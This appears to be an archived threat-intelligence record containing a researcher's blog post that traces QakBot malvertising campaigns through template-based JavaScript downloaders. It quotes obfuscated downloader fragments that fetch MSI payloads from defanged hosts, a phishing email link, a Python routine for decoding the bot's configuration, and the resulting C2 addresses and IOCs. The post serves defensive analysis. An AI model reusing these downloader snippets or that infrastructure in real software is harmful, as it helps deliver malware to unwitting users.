{
	"id": "7e294ca3-6d81-433b-a66e-6f861c1fa8eb",
	"created_at": "2026-04-06T00:18:25.038506Z",
	"updated_at": "2026-04-10T03:21:38.99414Z",
	"deleted_at": null,
	"sha1_hash": "f9430c3c88c02c2d51dd65a5184bf3e085e2e058",
	"title": "Qbot testing malvertising campaigns?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 696218,
	"plain_text": "Qbot testing malvertising campaigns?\r\nBy Jason Reaves\r\nPublished: 2023-03-03 · Archived: 2026-04-05 13:13:09 UTC\r\nBy: Jason Reaves, Josh Platt, Jonathan McCay and Kirk Sayre\r\nMalvertising has seen a significant uptick recently, a process by which threat actors buy pay per click ads\r\nthrough search engine PPC ad platforms in order to distribute malware masquerading as legitimate\r\nsoftware.\r\nBrad Duncan put out an article showing screenshotter[3] being delivered via malvertising on Google Ads[1].\r\nWhile investigating the listed C2 server, I noticed what appeared to be two naming conventions being used:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a\r\nPage 1 of 5\n\nRef: https://www.virustotal.com/gui/domain/acehphonnajaya.com/relations\r\nThe ones named Document show up in redirect chains that can be seen on UrlScan:\r\nRef: https://urlscan.io/search/#bobforlacitycouncil.com\r\nWe can find emails uploaded to VirusTotal with some of these links onboard,\r\na3c19a469f6a9337c8e33fb9249e6381eeebd5ab.\r\nGood day,\r\nI really need your opinion on all these files in the attachment.\r\nhttps://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a\r\nPage 2 of 5\n\nVIEW FILES \u003chxxps://homepagego[.com/scd3b\u003e\r\nHave a great day\r\nBonjour M. Amadou,\r\nPivot to a QakBot\r\nThe TeamViewer named javascript files stand out as they appear to be based on a template of some kind, example:\r\nef930c5607b24cd1b106a944e62e67c5004795a5\r\nA few interesting pieces of this file:\r\nanExpression = 4 * (4 / 5) + 5;\r\naSecondExpression = Math.PI * radius * radius;\r\ng = \"w\";f = \"h\";o = \"p\";heskkr = \".\";p = \".co\";s = \"n\";u = \"i\";ka = \"ke\";n = \"t\";\r\nvar today = new Date();\r\nvar a = new Array(4);\r\nkRate.InstallProduct(sAssign);\r\nThese pieces can be pivoted on to find a similarly named javascript file:\r\n44221d33eb4f6c9f7067cd7ddb1d8feb43ded30a\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThis file has some definite overlap in the template that was used:\r\nanExpression = 4 * (4 / 5) + 5;\r\naSecondExpression = Math.PI * radius * radius;\r\ng = \"w\";f = \"h\";o = \"p\";h = \".\";p = \"c\";s = \"n\";u = \"i\";ka = \"1\";n = \"t\";\r\nvar today = new Date();\r\nvar a = new Array(4);\r\nk.InstallProduct(String.fromCharCode(Math.random()*0+104)+String.fromCharCode(Math.random()*0+116)+St\r\nThe difference in this case however is what is downloaded:\r\nhttps://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a\r\nPage 3 of 5\n\nhxxp://richtools[.]info/qqq.msi\r\nPivoting on the TLSH of this file also leads to another javascript file:\r\n5ea8d40ca22df82aa4512bb359748dbbe1844ec8\r\nvar url = \"hxxp://216.120.201[.]170/downloads/ZoomInstallerFull.msi\"\r\nThis time possibly a Zoom theme? The first domain delivering qqq.msi was delivering this MSI package:\r\n72cef301ca25db6f1aa42f9380ab12ae2e99a725\r\nInside this package resides a QakBot stager, the config encoding has been slightly changed[2] since the last time I\r\nchecked:\r\ndef decode_data4(data):\r\n key = hashlib.sha1(b'bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN').digest()\r\n rc4 = ARC4.new(key)\r\n t = rc4.decrypt(data)\r\n tt = qbot_helpers.qbot_decode(t[20:])\r\n return(tt)\r\nNothing too new just using multiple previously used methods to decrypt the config, parsing is also slightly\r\ndifferent with the addition of a new flag value mixed in:\r\ndef parse_c2(data):\r\n out = \"\"\r\n if len(data) % 7 == 0:\r\n for i in range(0,len(data),7):\r\n if i \u003e 1:\r\n out += ','\r\n (f, o1, o2, o3, o4, p) = struct.unpack_from('\u003eBBBBBH', data[i:])\r\n out += (\"{} | {}.{}.{}.{}:{}\".format(f,o1,o2,o3,o4,p))\r\n if len(data[i+7:]) \u003c 7:\r\n break\r\n elif len(data) % 8 == 0:\r\n for i in range(0,len(data),8):\r\n if i \u003e 1:\r\n out += ','\r\n (f, o1, o2, o3, o4, p, ff) = struct.unpack_from('\u003eBBBBBHB', data[i:])\r\n out += (\"{} | {}.{}.{}.{}:{} | {}\".format(f,o1,o2,o3,o4,p,ff))\r\n if len(data[i+8:]) \u003c 8:\r\nhttps://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a\r\nPage 4 of 5\n\nbreak\r\n return out\r\nQakBot config:\r\n{'CONF1': b'10=BB12\\r\\n3=1675090602\\r\\n', 'C2': '1 | 24.9.220.167:443 | 1,1 | 92.239.81.124:443 | 1,1\r\nIOCs:\r\nrichtools.info\r\n216.120.201.170\r\nJS:\r\n44221d33eb4f6c9f7067cd7ddb1d8feb43ded30a\r\n5ea8d40ca22df82aa4512bb359748dbbe1844ec8\r\nMSI:\r\n72cef301ca25db6f1aa42f9380ab12ae2e99a725\r\nReferences\r\n1: https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376\r\n2: https://gist.github.com/sysopfb/8c71915b065a54e458b188fec8333c22\r\n3: https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me\r\nSource: https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a\r\nhttps://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a"
	],
	"report_names": [
		"qbot-testing-malvertising-campaigns-3e2552cbc69a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434705,
	"ts_updated_at": 1775791298,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9430c3c88c02c2d51dd65a5184bf3e085e2e058.pdf",
		"text": "https://archive.orkl.eu/f9430c3c88c02c2d51dd65a5184bf3e085e2e058.txt",
		"img": "https://archive.orkl.eu/f9430c3c88c02c2d51dd65a5184bf3e085e2e058.jpg"
	}
}